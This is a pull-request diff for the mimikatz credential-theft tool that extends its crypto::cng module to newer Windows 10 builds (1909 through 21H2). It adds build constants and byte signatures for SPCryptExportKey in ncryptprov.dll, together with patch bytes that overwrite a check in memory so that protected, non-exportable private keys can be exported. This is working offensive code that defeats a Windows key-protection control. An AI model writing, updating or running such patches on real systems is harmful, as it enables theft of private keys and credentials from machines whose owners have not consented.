Merge pull request #362 from hubert3/master

Fix crypto::cng on Windows 10 x64 1909, 2004, 20H2, 21H2

inc/globals.h

@@ -118,6 +118,7 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
 #define KULL_M_WIN_BUILD_10_1909	18363
 #define KULL_M_WIN_BUILD_10_2004	19041
 #define KULL_M_WIN_BUILD_10_20H2	19042
+#define KULL_M_WIN_BUILD_10_21H2	19044
 #define KULL_M_WIN_BUILD_2022		20348
 
 #define KULL_M_WIN_MIN_BUILD_XP		2500
@@ -127,4 +128,4 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
 #define KULL_M_WIN_MIN_BUILD_8		8000
 #define KULL_M_WIN_MIN_BUILD_BLUE	9400
 #define KULL_M_WIN_MIN_BUILD_10		9800
-#define KULL_M_WIN_MIN_BUILD_11		22000
+#define KULL_M_WIN_MIN_BUILD_11		22000

mimikatz/modules/crypto/kuhl_m_crypto_patch.c

@@ -113,6 +113,7 @@ BYTE PTRN_WI81_SPCryptExportKey[]			= {0xf6, 0x46, 0x24, 0x02, 0x75};
 BYTE PTRN_W10_1607_SPCryptExportKey[]		= {0xf6, 0x46, 0x24, 0x02, 0x0f, 0x84};
 BYTE PTRN_W10_1703_SPCryptExportKey[]		= {0xf6, 0x46, 0x24, 0x0a, 0x0f, 0x84};
 BYTE PTRN_W10_1809_SPCryptExportKey[]		= {0xf6, 0x45, 0x24, 0x02, 0x0f, 0x84};
+BYTE PTRN_W10_20H2_SPCryptExportKey[]		= {0xf6, 0x45, 0x24, 0x02, 0x75, 0x46};
 BYTE PATC_WI60_SPCryptExportKey_EXPORT[]	= {0x90, 0xe9};
 KULL_M_PATCH_GENERIC CngReferences[] = {
 	{KULL_M_WIN_BUILD_VISTA,	{sizeof(PTRN_WI60_SPCryptExportKey),	PTRN_WI60_SPCryptExportKey},	{sizeof(PATC_WI60_SPCryptExportKey_EXPORT), PATC_WI60_SPCryptExportKey_EXPORT}, {4}},
@@ -123,7 +124,10 @@ KULL_M_PATCH_GENERIC CngReferences[] = {
 	{KULL_M_WIN_BUILD_10_1703,	{sizeof(PTRN_W10_1703_SPCryptExportKey),PTRN_W10_1703_SPCryptExportKey},{sizeof(PATC_W10_1607_SPCryptExportKey_EXPORT), PATC_W10_1607_SPCryptExportKey_EXPORT}, {4}},
 	{KULL_M_WIN_BUILD_10_1803,	{sizeof(PTRN_W10_1607_SPCryptExportKey),PTRN_W10_1607_SPCryptExportKey},{sizeof(PATC_W10_1607_SPCryptExportKey_EXPORT), PATC_W10_1607_SPCryptExportKey_EXPORT}, {4}},
 	{KULL_M_WIN_BUILD_10_1809,	{sizeof(PTRN_W10_1809_SPCryptExportKey),PTRN_W10_1809_SPCryptExportKey},{sizeof(PATC_W10_1607_SPCryptExportKey_EXPORT), PATC_W10_1607_SPCryptExportKey_EXPORT}, {4}},
-	{KULL_M_WIN_BUILD_10_1909,	{sizeof(PTRN_W10_1607_SPCryptExportKey),PTRN_W10_1607_SPCryptExportKey},{sizeof(PATC_W10_1607_SPCryptExportKey_EXPORT), PATC_W10_1607_SPCryptExportKey_EXPORT}, {4}},
+	{KULL_M_WIN_BUILD_10_1909,	{sizeof(PTRN_W10_1809_SPCryptExportKey),PTRN_W10_1809_SPCryptExportKey},{sizeof(PATC_W10_1607_SPCryptExportKey_EXPORT), PATC_W10_1607_SPCryptExportKey_EXPORT}, {4}}, //ncryptprov.dll 10.0.18362.1411
+	{KULL_M_WIN_BUILD_10_2004,	{sizeof(PTRN_W10_1607_SPCryptExportKey),PTRN_W10_1607_SPCryptExportKey},{sizeof(PATC_W10_1607_SPCryptExportKey_EXPORT), PATC_W10_1607_SPCryptExportKey_EXPORT}, {4}}, //ncryptprov.dll 10.0.19041.662
+	{KULL_M_WIN_BUILD_10_20H2,	{sizeof(PTRN_W10_20H2_SPCryptExportKey),PTRN_W10_20H2_SPCryptExportKey},{sizeof(PATC_W10_1607_SPCryptExportKey_EXPORT), PATC_W10_1607_SPCryptExportKey_EXPORT}, {4}}, //ncryptprov.dll 10.0.19041.1620
+	{KULL_M_WIN_BUILD_10_21H2,	{sizeof(PTRN_W10_1607_SPCryptExportKey),PTRN_W10_1607_SPCryptExportKey},{sizeof(PATC_W10_1607_SPCryptExportKey_EXPORT), PATC_W10_1607_SPCryptExportKey_EXPORT}, {4}}, //ncryptprov.dll 10.0.19041.1202
 };
 #elif defined _M_IX86
 BYTE PTRN_WNO8_SPCryptExportKey[]			= {0xf6, 0x41, 0x20, 0x02, 0x75};
@@ -158,4 +162,4 @@ NTSTATUS kuhl_m_crypto_p_cng(int argc, wchar_t * argv[])
 		PRINT_ERROR(L"No CNG\n");
 	}
 	return STATUS_SUCCESS;
-}
+}